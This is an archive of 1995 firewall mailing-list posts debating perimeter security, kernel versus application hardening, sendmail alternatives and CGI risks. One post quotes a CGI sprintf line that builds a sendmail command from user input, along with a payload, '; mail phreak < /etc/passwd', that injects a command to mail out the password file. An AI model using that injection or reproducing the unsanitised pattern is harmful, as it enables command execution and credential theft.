Anyway, I've been typing long enough. Time to get to work. On our order floor, I've gotten Windows secure enough that people generally can't access DOS or any other but the 2 Windows applications we want them to run. Now I need to get one vendor to disable the 'save/save as' options in their menus; those represent the only remaining known security holes in our highly controlled PC environment. (No, I don't want to discuss the implications of Windows 95...) William Wells Manager, Technical Support Damark International, Inc (views are mine) Following is the mail from which all of this started.... }> problems I believe we (the security dweebs of the world) are going }> to face in the next 5 years: } }> 1) The notion of "network perimeter" will erode to the point }> where saying "protect all access into and out of your network" }> will be greeted with hysterical giggles. Right now when I }> say that many of my customers just look at me with a glazed }> eyed expression as if to say, "pull the other one." } }I agree. It is getting easier and easier for holes to be punched }through a large corporate "network perimeter". In my opinion (and }unfortunate experience), insiders are probably the ones who will do }the hole punching. }> 3) The number of new network-aware and IP-aware apps is }> now on an exponential growth curve. Consider, for a moment, }> how the typical network app is developed today: }> Version 1: no security }> Version 2: security? next version }> Version 3: something lame }> With the increase in network-permeation, the actual number }> of things that "get it right" will be close to zero. } }It would probably take a number of drastic problems with a few network }apps (like injuries or deaths or massive financial loss) before people }get really serious about getting security into apps. } }> 4) I used to worry that the government's myopic views }> on cryptography were going to keep us from building good }> high-integrity APIs and tools into our infrastrcture. }> Now I realize I was naive: it is *TOO* *LATE* to fix it; }> it has gotten too big. } }> What does this all mean? It may mean that there's good }> job security in being a computer professional. It may mean that }> someone is going to look at the situation and announce that we }> have no clothes. I *HOPE* it means that someone will begin to }> think of new computer security paradigms. Who knows what they }> will be? I don't think we're going to win the war the way it's }> going. } }2. Individual applications and hosts will become more hardened and }secure. For old applications, small individual sized "firewall-wrappers" }will become available. As the network perimeter erodes, it has to erode }to the the point of individual hosts or applications (or sets of hosts }and applications). So hosts will either become secure or have some kind }of secure wrapper/firewall. I like to think of the analogy of a filing }cabinet. If you can't lock it, put it in a room that you can lock. If you }can lock it, you can put it in a room that also can be locked. } }3. Enlightened companies will provide decent Internet access not only as }a competitive measure, but as a way to ensure that its employees don't }run off and create their own Internet access in a highly insecure and }risky matter. As Brent has pointed out, if people need Net access to }get their job done, they are probably going to find a way to get Net }access. It's better for a company to do the Internet access job right }instead of having employees construct some risky, insecure kluge. } }> mjr. } }-- }Jeff Sedayao }Intel Corporation }sedayao@argus.intel.com } From firewalls-owner Thu Sep 14 07:02:51 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA05055 for firewalls-outgoing; Thu, 14 Sep 1995 06:42:44 -0700 Received: from kgbvax.network.com (kgbvax.network.com [129.191.202.58]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA04976 for ; Thu, 14 Sep 1995 06:41:15 -0700 Received: (from ted@localhost) by kgbvax.network.com (8.6.9/8.6.9) id IAA17959; Thu, 14 Sep 1995 08:36:29 -0400 Date: Thu, 14 Sep 1995 08:36:29 -0400 From: Ted Doty Message-Id: <199509141236.IAA17959@kgbvax.network.com> To: sedayao@argus.intel.com, mjr@iwi.com Subject: Re: Firewall off Mortal Kombat XIV In-Reply-To: Mail from 'sedayao@argus.intel.com (Jeffrey C. Sedayao)' dated: Wed, 13 Sep 95 23:41:06 PDT Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk sedayao@argus.intel.com (Jeffrey C. Sedayao) wrote: > > > 1) The notion of "network perimeter" will erode to the point > > where saying "protect all access into and out of your network" > > will be greeted with hysterical giggles. Right now when I > > say that many of my customers just look at me with a glazed > > eyed expression as if to say, "pull the other one." > > I agree. It is getting easier and easier for holes to be punched > through a large corporate "network perimeter". In my opinion (and > unfortunate experience), insiders are probably the ones who will do > the hole punching. Not necessarially. Given the frequency of hacked phone switches, the security of an internal (say) Frame Relay wan is pretty suspect. But insiders don't need to phreak to sniff the net. You're right, tho ... the personnel department gets hacked much more often by insiders than by outsiders. All in all, the "hard crunchy shell around the soft chewy center" is looking more an more like the Maginot Line. > 2. Individual applications and hosts will become more hardened and > secure. For old applications, small individual sized "firewall-wrappers" > will become available. At the risk of being Yet Another Security Pinhead, this is the Wrong Thing To Do. If we think that the number of clueless boneheaded application developers is much larger than the number of clueless boneheaded kernel developers, then The Right Thing To Do is to put general security hooks in the kernel. I'm fairly optimistic anout something like IPSec combined with TCP wrappers; IPSec prevents anonymity, and the wrappers give you a modicum of access control. Let's fix it once (at the common - i.e. IP level), rather than having a million RFCs for "Privacy Enhanced Gopher". Then, if I STILL want to allow someone access into my system, I can't go crying to anyone when he zaps my disk partitions ... -- - Ted -------------------------------------------------------------------------- Ted Doty, Network Systems Corporation | phone: +1 301 596-2270 8965 Guilford Road, Suite 250 | fax: +1 410 381-3320 Columbia, MD, 21046 USA | voice mail: (800) 233-1485 -------------------------------------------------------------------------- The opinion expressed in this message is fictitious. Any resemblence to real opinions, living or dead, is purely coincidental. From firewalls-owner Thu Sep 14 07:30:23 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA06842 for firewalls-outgoing; Thu, 14 Sep 1995 07:12:09 -0700 Received: from psisa.com ([198.3.200.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA06830 for ; Thu, 14 Sep 1995 07:12:03 -0700 Received: (from chk@localhost) by psisa.com (8.6.12/guess) id JAA16576; Thu, 14 Sep 1995 09:08:59 -0500 Message-Id: <199509141408.JAA16576@psisa.com> Subject: Re: Secure version of Sendmail To: jgt10@amdahl.com (John G. Thompson) Date: Thu, 14 Sep 1995 09:08:59 -0500 (CDT) Cc: smith@sctc.com, firewalls@GreatCircle.COM In-Reply-To: from "John G. Thompson" at Sep 13, 95 08:38:50 pm From: chk@psa.pencom.com (Christian Kuhtz) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 692 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > ..Sendmail is the only useful mail package out there out there. I'd be happy > > to adopt anything which offers me Sendmail functionality in a more secure > > fashion.... > > Have you honestly looked at smail? Yes, and there are some things that just don't work in Smail, and working on the code made me throw up several times. Sorry. I'm not an innocent newbie :). NOTE: I'm comparing Sendmail V8 with Smail. And most of the times.. Smail just doesn't quite cut it. MHO. Best Regards, Chris --___ ____ __ | _ \/ __/| \ Christian Kuhtz +1 914-684-4467 | _/\__ \| \ \ Pencom Systems Administration Services fax: +1 914-684-3791 |_| /___/|_|__\ From firewalls-owner Thu Sep 14 07:32:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA07617 for firewalls-outgoing; Thu, 14 Sep 1995 07:29:28 -0700 Received: from gateway.sctc.com (gateway.sctc.com [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA07604 for ; Thu, 14 Sep 1995 07:29:23 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id JAA29451; Thu, 14 Sep 1995 09:31:20 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 279880001; 14 Sep 95 10:27 CDT Received: from sctc.com by sccmailhost.sctc.com id 060360000; 14 Sep 95 10:27 CDT Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id JAA19092; Thu, 14 Sep 1995 09:27:20 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id JAA17333; Thu, 14 Sep 1995 09:27:19 -0500 From: Rick Smith Message-Id: <199509141427.JAA17333@shade.sctc.com> Subject: Re: Secure version of Sendmail To: Peter da Silva Date: Thu, 14 Sep 1995 09:27:19 -0500 (CDT) Cc: smith@sctc.com, firewalls@GreatCircle.COM In-Reply-To: <9509132257.AA09837@sonic.nmti.com.nmti.com> from "Peter da Silva" at Sep 13, 95 05:57:13 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 602 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Of course a class B operating system is itself a large, capable, general > purpose package. True enough. The point is, you have to identify and exploit appropriate holes in both sendmail and in the nonbypassible access control mechanism of the OS. A properly designed mechanism is going to present a different kind of penetration problem. I think it's less likely that an attacker will find appropriate holes in both simultaneously. And that's what security is about: increasing work factor and reducing the likelihood of a successful attack. Rick. smith@sctc.com secure computing corporation From firewalls-owner Thu Sep 14 08:03:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA08355 for firewalls-outgoing; Thu, 14 Sep 1995 07:49:33 -0700 Received: from habanero.jmu.edu (habanero.jmu.edu [134.126.70.210]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA08346; Thu, 14 Sep 1995 07:49:28 -0700 Message-Id: <199509141449.HAA08346@miles.greatcircle.com> Received: by habanero.jmu.edu (1.37.109.16/16.2) id AA002670097; Thu, 14 Sep 1995 10:48:17 -0400 Date: Thu, 14 Sep 1995 10:48:17 -0400 From: gary flynn To: firewalls-owner@GreatCircle.COM, mjr@iwi.com, sedayao@argus.intel.com Subject: Re: Firewall off Mortal Kombat XIV Cc: firewalls@GreatCircle.COM, hulveydb@falcon.jmu.edu Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From: Ted Doty > > sedayao@argus.intel.com (Jeffrey C. Sedayao) wrote: > > > > > 1) The notion of "network perimeter" will erode to the point > > > where saying "protect all access into and out of your network" > > > will be greeted with hysterical giggles. Right now when I > > > say that many of my customers just look at me with a glazed > > > eyed expression as if to say, "pull the other one." > > > > I agree. It is getting easier and easier for holes to be punched > > through a large corporate "network perimeter". In my opinion (and > > unfortunate experience), insiders are probably the ones who will do > > the hole punching. > > Not necessarially. Given the frequency of hacked phone switches, the > security of an internal (say) Frame Relay wan is pretty suspect. But > insiders don't need to phreak to sniff the net. You're right, tho ... > the personnel department gets hacked much more often by insiders than > by outsiders. > > All in all, the "hard crunchy shell around the soft chewy center" is looking > more an more like the Maginot Line. > > > 2. Individual applications and hosts will become more hardened and > > secure. For old applications, small individual sized "firewall-wrappers" > > will become available. > > At the risk of being Yet Another Security Pinhead, this is the Wrong > Thing To Do. If we think that the number of clueless boneheaded application > developers is much larger than the number of clueless boneheaded kernel > developers, then The Right Thing To Do is to put general security hooks in > the kernel. > > I'm fairly optimistic anout something like IPSec combined with TCP wrappers; > IPSec prevents anonymity, and the wrappers give you a modicum of access > control. Let's fix it once (at the common - i.e. IP level), rather than > having a million RFCs for "Privacy Enhanced Gopher". > Isn't this what SecureWare's Hannah product does? Can someone point me to a site that can tell me the progress of IPv6... both the protocols and implementations? thanks, Gary Flynn James Madison University From firewalls-owner Thu Sep 14 08:15:32 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA06742 for firewalls-outgoing; Thu, 14 Sep 1995 07:09:38 -0700 Received: from kgbvax.network.com (kgbvax.network.com [129.191.202.58]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA06715 for ; Thu, 14 Sep 1995 07:09:27 -0700 Received: (from ted@localhost) by kgbvax.network.com (8.6.9/8.6.9) id JAA18011; Thu, 14 Sep 1995 09:05:49 -0400 Date: Thu, 14 Sep 1995 09:05:49 -0400 From: Ted Doty Message-Id: <199509141305.JAA18011@kgbvax.network.com> To: william.wells@damark.com, firewalls@greatcircle.com Subject: Re: Firewall off Mortal Kombat XIV In-Reply-To: Mail from '"william.wells" ' dated: Thu, 14 Sep 95 08:08:00 +6C Sender: firewalls-owner@GreatCircle.COM Precedence: bulk william.wells wrote: > If the consumer wanted security, programmers would add it. The leading > home financial software packages support passwords; why? because the > people using their software don't want people snooping. When companies > lose market share because of poor security, vendors will add it. This Well said. Mostly companies go out of business because they INCLUDE security features, which makes their product more costly, harder to use, slower, ... Yet another reason to put it in the kernel. > As for the comment about being 'behind the curve'. The example I use > is NFS. It was written to fill a niche and has blossomed into code > supported on most any TCP/IP system. There are more secure replacements > available but critical mass and lack of widespread support assures > they won't generally be used. NFS, itself, has known security holes > which, because of its design. Because of its widespread use, its > doubtful that it will ever change much. Hence, NFS is 'behind the > curve'. It is an insecure application which is a 'de-facto standard' > which, fortunately, has such obvious security holes and other > management issues that almost all Corporate types can recognize the > security risks. Yet ANOTHER reason to do it in IP. If my mount program is brain damaged, and does sillyness like exporting everything to the world because my command line was longer than 128 (or 156, or 212, or ...), then I'm STILL OK is I have decent authentication and access control in the kernel. If we try to secure all applications, past, present, and future, then my son (turns 3 tomorrow!) will have a great future as an Internet Security Consultant. We should do it once, right. -- - Ted -------------------------------------------------------------------------- Ted Doty, Network Systems Corporation | phone: +1 301 596-2270 8965 Guilford Road, Suite 250 | fax: +1 410 381-3320 Columbia, MD, 21046 USA | voice mail: (800) 233-1485 -------------------------------------------------------------------------- The opinion expressed in this message is fictitious. Any resemblence to real opinions, living or dead, is purely coincidental. From firewalls-owner Thu Sep 14 08:27:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA07868 for firewalls-outgoing; Thu, 14 Sep 1995 07:33:51 -0700 Received: from [198.102.244.40] (pm-ppp-2.greatcircle.com [198.102.244.40]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA07849; Thu, 14 Sep 1995 07:33:41 -0700 X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 14 Sep 1995 10:33:14 -0800 To: sedayao@argus.intel.com (Jeffrey C. Sedayao), alan@mid.net (Alan Hannan) From: Brent@GreatCircle.COM (Brent Chapman) Subject: Re: firewall BOF at LISA/USENIX? Cc: mjr@iwi.com, firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 10:45 PM 9/13/95, Jeffrey C. Sedayao wrote: >[much deleted] > >> BTW - Those going to LISA/USENIX (that's you marcus) - what say you about >> organizing our own Beer/BOF at some time? Perhaps we all pile into my >> rented regal and raise security-hell at some local bar. Let me know if >>you're >> interested. > >Is there going to be a formal firewall BOF there at LISA/USENIX? If so, >when (day and time) will it be? Yes, it's scheduled for Thursday, 6:30pm to 7:30pm, immediately after the CERT BOF (at 6:00pm) and immediately before the reception. -Brent -- Brent Chapman | Great Circle Associates | For Firewalls Tutorial info: Brent@GreatCircle.COM | 1057 West Dana Street | Tutorial-Info@GreatCircle.COM +1 415 962 0841 | Mountain View, CA 94041 | http://www.greatcircle.com From firewalls-owner Thu Sep 14 08:30:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA08846 for firewalls-outgoing; Thu, 14 Sep 1995 08:01:45 -0700 Received: from gw2.att.com (gw2.att.com [192.20.239.134]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA08838 for ; Thu, 14 Sep 1995 08:01:41 -0700 Received: from vodka.sse.att.com (vodka.gc.att.com) by ig2.att.att.com id AA14902; Thu, 14 Sep 95 11:01:19 EDT Message-Id: <9509141501.AA14902@ig2.att.att.com> From: mdr@vodka.sse.att.com Subject: Re: Secure version of Sendmail To: peter@nmti.com (Peter da Silva) Date: Thu, 14 Sep 1995 11:02:00 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: <9509132257.AA09837@sonic.nmti.com.nmti.com> from "Peter da Silva" at Sep 13, 95 05:57:13 pm X-Mailer: ELM [version 2.4 PL23-upenn2.7] Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Peter, > > > The point is, you *can't* guarantee that a large, capable, general > > purpose package is bug free, whether the bugs are security oriented or > > anything else. So you need something to backstop it, like Type > > Enforcement or maybe MLS protections. > > Of course a class B operating system is itself a large, capable, general > purpose package. > True, but the point is that you must break sendmail *and* the backstop before your intrusion will be successful. C2 and higher systems will be auditing sendmail's every move. If sendmail forks a shell or begins to access non mail-related files, a properly configured B level OS can detect that, and shut sendmail down and alert the administrator. Also hacking through a MLS or Type Enforcement system is not trivial. The same logic applies to the recent syslog problems. If your OS can monitor the daemons, it has a chance to detect when they've been overrun by means of yet another buffer overflow bug. That is why I am a strong advocate of running firewalls on trusted servers. Mark Riggins Secure Systems Engineering AT&T Bell Labs From firewalls-owner Thu Sep 14 08:32:56 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA08046 for firewalls-outgoing; Thu, 14 Sep 1995 07:42:31 -0700 Received: from gateway.sctc.com (gateway.sctc.com [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA08039 for ; Thu, 14 Sep 1995 07:42:27 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id JAA29553; Thu, 14 Sep 1995 09:44:27 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 281620000; 14 Sep 95 10:41 CDT Received: from sctc.com by sccmailhost.sctc.com id 061380000; 14 Sep 95 10:40 CDT Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id JAA19986; Thu, 14 Sep 1995 09:40:38 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id JAA19663; Thu, 14 Sep 1995 09:40:37 -0500 From: Rick Smith Message-Id: <199509141440.JAA19663@shade.sctc.com> Subject: Re: Secure version of Sendmail To: "John G. Thompson" Date: Thu, 14 Sep 1995 09:40:37 -0500 (CDT) Cc: smith@sctc.com, firewalls@greatcircle.com In-Reply-To: from "John G. Thompson" at Sep 13, 95 08:38:50 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1022 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Have you honestly looked at smail? It doesn't really matter fundamentally whether the mail package is sendmail with its known, documented, and occasionally patched legion of bugs or some different hunk of software for the same purpose. In all cases, bugs will occasionally appear. The purpose of nonbypassable access control mechanisms like Type Enforcement is to prevent the inevitable bugs from allowing instant and complete compromise of the system. Even if today's version of "smail" is proven secure (unlikely) then where are we going to find the time/money/effort/expertise to prove that next years' patched version is also secure? And what about the incremental changes after that? At some point even the best designed and engineered software component will look like sendmail, especially packages in the public domain. It costs lots of money and effort to maintain design integrity across multiple releases, and that's a huge source of bugs right there. Rick. smith@sctc.com secure computing corporation From firewalls-owner Thu Sep 14 09:02:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA10985 for firewalls-outgoing; Thu, 14 Sep 1995 08:43:21 -0700 Received: from relay1.UU.NET (relay1.UU.NET [192.48.96.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA10972 for ; Thu, 14 Sep 1995 08:43:16 -0700 Received: from offramp.dsccc.com by relay1.UU.NET with SMTP id QQzhec19711; Thu, 14 Sep 1995 11:42:14 -0400 Received: by offramp.dsccc.com (5.67b/SMI-V1.8) id AA20329; Thu, 14 Sep 1995 10:40:57 -0500 Received: from onramp(192.245.102.129) by offramp via smap (V1.3mjr) id sma020314; Thu Sep 14 10:40:42 1995 Received: from optilink.dsccc.com (optilink.optilink.dsccc.com [192.9.200.1]) by camelot.dsccc.com (8.6.11/8.6.10) with SMTP id KAA00383 for ; Thu, 14 Sep 1995 10:40:43 -0500 Received: from earth.optilink.dsccc.com by optilink.dsccc.com with smtp id m0stGP5-0002MIC; Thu, 14 Sep 95 08:40 PDT Received: by earth.optilink.dsccc.com id m0stGRE-0001PlC; Thu, 14 Sep 95 08:42 PDT Date: Thu, 14 Sep 95 08:42 PDT From: James_Dehnert@optilink.optilink.dsccc.com Message-Id: <9509140842.ZM5969@earth.optilink.dsccc.com> In-Reply-To: jgt10@amdahl.com (John G. Thompson) "Re: Secure version of Sendmail" (Sep 13, 9:48pm) References: X-Pgp-Print: 91 FE 2F C5 9F B3 ED 9F F9 CD C6 7F 87 FF F6 6E X-Mailer: Z-Mail (3.2.0 06sep94) To: firewalls@GreatCircle.COM Subject: Re: Secure version of Sendmail Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sep 13, 9:48pm, John G. Thompson wrote: > Subject: Re: Secure version of Sendmail > > ..Sendmail is the only useful mail package out there out there. I'd be happy > > to adopt anything which offers me Sendmail functionality in a more secure > > fashion.... > > Have you honestly looked at smail? > > JGT > Here here! I use smail on all our machines. My basic config file is about 10 lines long. I have it up to 20 to do things a bit more uniformly but 10 lines does all I need. The way I look at it, the easier it is to configure, the less chance your going to screw it up. It has also passed all the tests I have given it based on known sendmail problems. -- +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=++=+=+=+=+=+=+=+ = James "Zeke" Dehnert Zeke_Dehnert@optilink.dsccc.com = + Unix Network Administrator (707) 792-7000 + = DSC Access Products Div. Petaluma California = + The opinions represented herein are not necessarily those of DSC + =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+==+=+=+=+=+=+=+=+=+=+=+=+=+=+= From firewalls-owner Thu Sep 14 09:12:49 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA08168 for firewalls-outgoing; Thu, 14 Sep 1995 07:45:53 -0700 Received: from erenj.com (ereapp.ERENJ.COM [159.70.31.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA08161 for ; Thu, 14 Sep 1995 07:45:47 -0700 Received: from eredns.erenj.com(159.70.1.252) by ereapp.erenj.com via smap (V1.3) id sma021094; Thu Sep 14 10:43:12 1995 Posted-Date: Thu, 14 Sep 1995 10:43:54 -0400 From: "Bryan D. Boyle" Message-Id: <9509141043.ZM5304@maverick.erenj.com> Date: Thu, 14 Sep 1995 10:43:53 -0400 In-Reply-To: Ted Doty "Re: Firewall off Mortal Kombat XIV" (Sep 14, 8:36am) References: <199509141236.IAA17959@kgbvax.network.com> X-Phone: (908) 730-3338 X-Saying: Strange problems call for strange solutions. X-Face: "Pd&4kXWsi"3Hc_Y~I-ts24DN$w~Hh)&L-P9DZvE"~_~m),~Y&N_]TUIM*4.r@z$SxVL]}v=+IP>Fuq{zx%{KKj"Kys1Q5{|m*l}:[T;N:/=@5[xOIpR$%skp$f0#6^j\1+ -?l%Yk/+S8Y!3J@{~!Ao4-COV:Ft}{]oZ&1=!@<>UIh2s X-Mailer: Z-Mail (3.2.1 10apr95) To: firewalls@greatcircle.com Subject: Re: Firewall off Mortal Kombat XIV Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sep 14, 8:36am, Ted Doty wrote: > > All in all, the "hard crunchy shell around the soft chewy center" is looking > more an more like the Maginot Line. Depends on your definition. Read the Berferd paper for inspiration--lots of effort and thought has gone into designing protection schemes that not only provide a level of securable transaction support but also provide a reporting and tracking mechanism (sometimes called a 'tar-baby' or 'yellow stickey' paradigm--thanks marcus...) that attempts to educate the administrator not only when an attack is occuring, but leave behind breadcrumbs as the cretin is trying. Digressive example: Any fixed fortification such as a Maginot line is a strong defense against a point-source attack. Witness the center of the Union line at Gettysburg on the 3rd day and the effect on Pickett's division, or Fredericksburg the previous December and the effect on Burnside's boys. One would dare take that example, perchance, as a model for firewall design at the service level (telnet, ftp, hypedtext, news, etc), with the proviso that by enlarging the model to *acknowledge* flanking maneuvers by determined foemen, we could resist a determined focused charge at our stone wall, while protecting the flanks, AND giving us time to alert the messengers and get the rest of the defense into line. (Yes, sometimes you have to look on firewall and system security in a militaristic vein...not all lessons are learned from O'Reilly...:)...besides, it will make you more widely read...;)) > > At the risk of being Yet Another Security Pinhead, this is the Wrong > Thing To Do. If we think that the number of clueless boneheaded application > developers is much larger than the number of clueless boneheaded kernel > developers, then The Right Thing To Do is to put general security hooks in > the kernel. There is already that ongoing problem, since the first corporate auditor bumped heads with the first apps programmer. Throw in a bit of whining about creative freedom and the like. One must assume, in any case, that the application code cranker or the kernal guru is only interested in *their* narrow focus. As a net admin, we are the ones that have to define, no matter what smells and bells they add in the realm of creeping featuritis, what the limits of their operation in the hands of the GUP (great unwashed population) will be. > > I'm fairly optimistic anout something like IPSec combined with TCP wrappers; > IPSec prevents anonymity, and the wrappers give you a modicum of access > control. Let's fix it once (at the common - i.e. IP level), rather than > having a million RFCs for "Privacy Enhanced Gopher". How about the other way: define the boundaries and then write the code (gasp!...:)) > > Then, if I STILL want to allow someone access into my system, I can't go > crying to anyone when he zaps my disk partitions ... Absolutely. Never assume that giving a specific user access will ensure that user will not look out for his own amusement rather than your operation... keeps us in business, anyway... Just my $.02 -- Bryan D. Boyle | Thru the gateway, off the router, over the T-1 #include | backbone, nothing but 'Net... EMAIL: bdboyle@erenj.com | :) ---------------------------------- -------------------- From firewalls-owner Thu Sep 14 09:32:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA13161 for firewalls-outgoing; Thu, 14 Sep 1995 09:18:56 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA13154 for ; Thu, 14 Sep 1995 09:18:51 -0700 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA09694; Thu, 14 Sep 95 12:13:59 -0400 Date: Thu, 14 Sep 95 12:13:58 -0400 Message-Id: <9509141613.AA09694@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: User Authentication & encryption Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Bill rites: >I've been being told that most companies are piling their resources >(buck) on the authentication and not using traffic encryption because >they feel that session assumptions is really more difficult that one >would be lead to believe and encryption represents considerable overhead. Well I have been pushing full encryption for *both* protection of data and strong authentication for years now and hallelluia I think we have turned the corner. The Netscape Commerce server is the best reason I have seen to buy Netscape stock. Warmly, Padgett (I will take EBCDIC in vein no more, forever) From firewalls-owner Thu Sep 14 09:39:58 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA12269 for firewalls-outgoing; Thu, 14 Sep 1995 09:01:10 -0700 Received: from goole.octacon.co.uk (goole.octacon.co.uk [193.118.80.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA12262 for ; Thu, 14 Sep 1995 09:00:56 -0700 Received: from potato (potato.octacon.co.uk [193.118.80.27]) by goole.octacon.co.uk (8.6.9/8.6.9) with SMTP id QAA21599 for ; Thu, 14 Sep 1995 16:58:19 +0100 Date: Thu, 14 Sep 1995 16:42:07 +0100 (BST) From: Stefan Thatcher Subject: WWW - http - cgi_scripts To: firewalls@greatcircle.com Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, not sure whether this is a Firewall query, but here goes - The powers that be have decreed that a WWW server be set up to allow individuals to write their own pages on it :-) Sounds OK but little bells have started ringing in the malicious.paranoia.uk domain at the thought of untamed cgi's roaming the country-side (:-o I'd sure appreciate any advice, pointers, tips etc before setting out on this long and lonely road /:-) TIA Stefan -------------------------------------------------------------------------------- Stefan Thatcher v: +44 (0)1642 210 087 Octacon Ltd. f: +44 (0)1642 210 518 York House, e: Stefan.Thatcher@octacon.co.uk 102,108 Borough Road, Middlesbrough, Cleveland TS1 2HJ UK -------------------------------------------------------------------------------- From firewalls-owner Thu Sep 14 10:02:45 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA13588 for firewalls-outgoing; Thu, 14 Sep 1995 09:33:09 -0700 Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA13581 for ; Thu, 14 Sep 1995 09:33:05 -0700 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id LAA29354 for greatcircle.com!firewalls; Thu, 14 Sep 1995 11:20:25 -0500 Received: by ris1.nmti.com (smail2.5) id AA07028; 14 Sep 95 10:49:43 CDT (Thu) Received: by sonic.nmti.com; id AA24527; Thu, 14 Sep 1995 11:16:28 -0500 From: peter@nmti.com (Peter da Silva) Message-Id: <9509141616.AA24527@sonic.nmti.com.nmti.com> Subject: Re: Secure version of Sendmail To: smith@sctc.com (Rick Smith) Date: Thu, 14 Sep 1995 11:16:27 -0500 (CDT) Cc: firewalls@greatcircle.com In-Reply-To: <199509141427.JAA17333@shade.sctc.com> from "Rick Smith" at Sep 14, 95 09:27:19 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 635 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > True enough. The point is, you have to identify and exploit > appropriate holes in both sendmail and in the nonbypassible access > control mechanism of the OS. A properly designed mechanism is going to > present a different kind of penetration problem. The point is that if you have a class B O/S you're more likely to skimp on the application level stuff. If you get both, that's great, but you usually only get one. I just found another: sprintf(txt, "sendmail -f %s %s < %s", user_provided_string, server_provided_string, tempname); in a web server CGI script. Just pop "; mail phreak < /etc/passwd" in as your address... From firewalls-owner Thu Sep 14 10:29:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA12902 for firewalls-outgoing; Thu, 14 Sep 1995 09:12:26 -0700 Received: from osshe.edu (OSSHE.EDU [140.211.10.20]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with 